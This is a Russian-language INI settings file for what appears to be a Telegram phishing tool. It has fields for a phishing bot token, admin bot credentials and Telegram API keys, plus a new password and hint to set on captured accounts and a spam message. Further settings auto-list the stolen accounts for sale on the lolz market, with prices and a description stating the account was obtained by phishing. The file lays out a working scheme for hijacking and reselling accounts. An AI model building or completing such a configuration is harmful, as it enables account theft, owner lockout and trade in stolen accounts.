[Settings]
user_bot = токен фишинг бота (+)
user_msg = Hello
user_link = https://t.me/end_soft
admin_bot = токен админского бота (+)
admin_id = телеграм айди админа (+)
api_id = айди с приложения телеграм (+)
api_hash = хеш с приложения телеграм (+)
new_pass = pohui
new_hint = дата рождения адольфа гитлера
spam_msg = спам текст
lolz_key = ключ от маркета (+)
lolz_account_title = только из печки, автозалив
lolz_account_price = 25 
lolz_account_premium_price = 80
lolz_account_description = Этот аккаунт добыт фишингом
lolz_account_origin = fishing
templ = Авторизация
proxy = 0
lolz = 0

